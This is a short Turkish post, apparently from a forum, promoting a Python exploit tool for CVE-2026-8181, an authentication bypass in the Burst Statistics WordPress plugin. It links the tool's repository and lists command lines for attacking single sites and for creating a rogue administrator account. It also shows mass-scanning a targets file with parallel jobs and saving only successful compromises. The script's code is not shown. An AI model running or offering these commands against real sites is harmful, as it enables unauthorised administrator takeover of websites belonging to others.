CVE-2026-8181, WordPress ekosisteminde son dönemin en kritik kimlik doğrulama zafiyetlerinden biri olarak öne çıkıyor. Burst Statistics eklentisinin belirli sürümlerini etkileyen bu açık, saldırganların yalnızca geçerli bir yönetici kullanıcı adını bilerek yetkisiz şekilde yönetici bağlamında işlem yapabilmesine imkan tanıyor. CVSS 9.8 skoruna sahip olan zafiyet, düşük karmaşıklık ve uzaktan tetiklenebilir olması nedeniyle yüksek risk kategorisinde değerlendiriliyor.
Repo : https://github.com/murrez/CVE-2026-8181

# KONUNUN SAHİBİ MÜRREZDİR

Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local/ -U admin -o sonuc.txt -kTek site + yeni yönetici (lab)
python3 CVE-2026-8181.py -u http://lab.local/ -U admin --create-user -o sonuc.txt -kÇoklu + birleşik dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -kÇoklu + klasörde site başına dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -kNot: WordPress.org’daki 200.000+ aktif kurulum sayısı eklentinin tüm kullanıcı tabanıdır; sitelerin tamamının zafiyetli sürümde olduğu anlamına gelmez. Gerçek etki için sürüm + ortam (HTTP, uygulama parolası uygunluğu vb.) doğrulanmalıdır.Repo : https://github.com/murrez/CVE-2026-8181

# KONUNUN SAHİBİ MÜRREZDİR
